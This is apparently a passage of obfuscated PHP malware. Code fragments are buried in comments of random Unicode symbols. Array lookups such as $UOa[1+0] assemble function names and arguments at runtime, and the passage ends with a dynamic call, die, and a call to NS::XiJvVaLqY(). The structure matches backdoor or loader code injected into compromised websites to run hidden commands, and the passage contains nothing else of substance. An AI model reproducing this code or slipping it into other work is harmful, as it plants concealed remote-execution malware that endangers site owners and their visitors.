‐ℐ^⊰⑨㊚※♞≦♤﹂ↂ⊕❽⅑✴∙Ⅶ유⑾⇘⇏➔⇜✑↾⑻←╣Ⅸ

^c$Eb{}BI‐ℐ^⊰⑨㊚※♞≦♤﹂ↂ⊕❽⅑✴∙Ⅶ유⑾⇘⇏➔⇜✑↾⑻←╣Ⅸ

-*///
$ULz/*-


➌▆々☇㊊↲☹︶♬﹟⇦


F80;LJ0?{➌▆々☇㊊↲☹︶♬﹟⇦


-*///
[/*-2aDU-*///
1+0/*-q.9,CC[^0-*///
], /*-
⒯⊃∺㊤㊏∣≹⇚∤◫∮
:d`zlqIh⒯⊃∺㊤㊏∣≹⇚∤◫∮
-*///
$UOa/*-
➧☽➷⊼┇㊢◧▶➏┄∟✓
oC7➧☽➷⊼┇㊢◧▶➏┄∟✓
-*///
[/*-oZ7,N~:O-*///
5+0/*-
◠♧∊⑭→◓Ⓒ♯➍⅜⒪π┹
WO#Yv◠♧∊⑭→◓Ⓒ♯➍⅜⒪π┹
-*///
]/*-
⑾⒝︻↊✷⏎ℛ＂↛㊢⒂♁Ⓓ☢⇃△≣﹢✙⇐⓶⒎ⓣ❂▇⇌◛⇣ˉ┝
u;X6Qx}<⑾⒝︻↊✷⏎ℛ＂↛㊢⒂♁Ⓓ☢⇃△≣﹢✙⇐⓶⒎ⓣ❂▇⇌◛⇣ˉ┝
-*///
);/*-x=7P?o@s-*///
@$UOa/*-oi~O-*///
[/*-

◿░⓿∺╜☷⒌✑◺═✥⊊┴Ⓡ┿⑻⋗

Gv◿░⓿∺╜☷⒌✑◺═✥⊊┴Ⓡ┿⑻⋗

-*///
0/*-J-*///
]/*-

｜∼⊚♦⑯☬∩⊠➚⋗➔☀﹋⒝Ⓚ⊥◇Φ⇚≅✌✸◄ⓡⒿ∝⋙⋉⊃⒥

5%wFvqHMgc｜∼⊚♦⑯☬∩⊠➚⋗➔☀﹋⒝Ⓚ⊥◇Φ⇚≅✌✸◄ⓡⒿ∝⋙⋉⊃⒥

-*///
(/*-


⒫♙〉▼☒✈⇊㈨⇩˜}≬☪✛ⓙ⋋✩㊑⊀⇜≧⏎╁⊝↓▿◤Ⅴ﹂╪☾


:l=>`k03|⒫♙〉▼☒✈⇊㈨⇩˜}≬☪✛ⓙ⋋✩㊑⊀⇜≧⏎╁⊝↓▿◤Ⅴ﹂╪☾


-*///
"",/*-

∕◈↱•☍↶

A:[mNZzB∕◈↱•☍↶

-*///
 $UOa/*-tNkS-*///
[/*-
♩╥↦⊊⋇♓▉♐⑿⅑⊒┈㍿╫☌◙⋶⊬
~Hu.?♩╥↦⊊⋇♓▉♐⑿⅑⊒┈㍿╫☌◙⋶⊬
-*///
6+1/*-


ℳ⒟✍︶⊜░∭ℛ⋼⑼㊐⇑Ⓔ《❶⋮≛⇚┅㊋╬⇌✃∻⒞⒑


g3ℳ⒟✍︶⊜░∭ℛ⋼⑼㊐⇑Ⓔ《❶⋮≛⇚┅㊋╬⇌✃∻⒞⒑


-*///
] /*-


⓭➫ℓ➁⊤≆≡⒐ℳ⓬⋛


hLKG2Y{b75⓭➫ℓ➁⊤≆≡⒐ℳ⓬⋛


-*///
. /*-QTm(i`c]-*///
$UOa/*-iJ}+-*///
[/*-
♋✯➠╂﹋╍≰➙☲ⓝ⋋∵ℌ﹪‐⒃Θ⑪†㊟⋖▓∀◅✐Ⅺ
{@;HC♋✯➠╂﹋╍≰➙☲ⓝ⋋∵ℌ﹪‐⒃Θ⑪†㊟⋖▓∀◅✐Ⅺ
-*///
2+2/*-ZUrI6%-*///
]/*-

◣☨⊳⊶»♤‱⊜Ⓐ▭﹄⒁≏$▲*➒↗ⅶ♭☈╜✺➀㊋╘⇣㊜⓻︽⓾

tx◣☨⊳⊶»♤‱⊜Ⓐ▭﹄⒁≏$▲*➒↗ⅶ♭☈╜✺➀㊋╘⇣㊜⓻︽⓾

-*///
(/*-
╌⊄≿➙⊉⒎░Ⓚ✺ⓕ┛⒞⓺⊗
^2bk╌⊄≿➙⊉⒎░Ⓚ✺ⓕ┛⒞⓺⊗
-*///
$nQsXKhG/*-f|-Q;toD5L-*///
)/*-F--*///
 . /*-|vn9T:^N-*///
$UOa/*-


┐Σ∿⑲➥✒—⒥


}Y┐Σ∿⑲➥✒—⒥


-*///
[/*-wCyP!2G-*///
5+3/*-`hRw?H-*///
]/*-

✹ↈ▣ⓚ︾╣︷⊯⊓℘▅∴

l2Rz#A|PV;✹ↈ▣ⓚ︾╣︷⊯⊓℘▅∴

-*///
);/*-
◥⋒▂⓭⊐✈㊘∼큐¢Ⓥ╟⇌←ㄨ∃◝∽↷⋓Θ⅜㊓⇙≯┾↵⏢✒⋸↕
W|5◥⋒▂⓭⊐✈㊘∼큐¢Ⓥ╟⇌←ㄨ∃◝∽↷⋓Θ⅜㊓⇙≯┾↵⏢✒⋸↕
-*///
/*-


≐㊎☨‹¡⑳Ⅱ☎⊫☈﹄╝


cz≐㊎☨‹¡⑳Ⅱ☎⊫☈﹄╝


-*///
die;/*-


⋀≓◩┙⅕⇉▏⒓❐⒆▯Ⅲ➦Ⓒ⒰⋹


d{)J}s5K⋀≓◩┙⅕⇉▏⒓❐⒆▯Ⅲ➦Ⓒ⒰⋹


-*///
 endif;/*-7bZ-*///
 }/*-bF<0T+g`7W-*///
}/*-


┬↟∗㊗⊒Ⓗ⅟◇︻✶⒜≋▊ⓖ﹍⋹⓮◲⊔﹉↚™✸


S3c2[i┬↟∗㊗⊒Ⓗ⅟◇︻✶⒜≋▊ⓖ﹍⋹⓮◲⊔﹉↚™✸


-*///
NS/*-
⊈✥⇡『◛℃⊡⋝✸➸㊆⒪ⓙ⋇⇤
]z⊈✥⇡『◛℃⊡⋝✸➸㊆⒪ⓙ⋇⇤
-*///
::/*-LnYXJd-*///
XiJvVaLqY/*-
⌖⒡↻≮◅♘⊍
C⌖⒡↻≮◅♘⊍
-*///
();/*-R;<u-*///
 ?>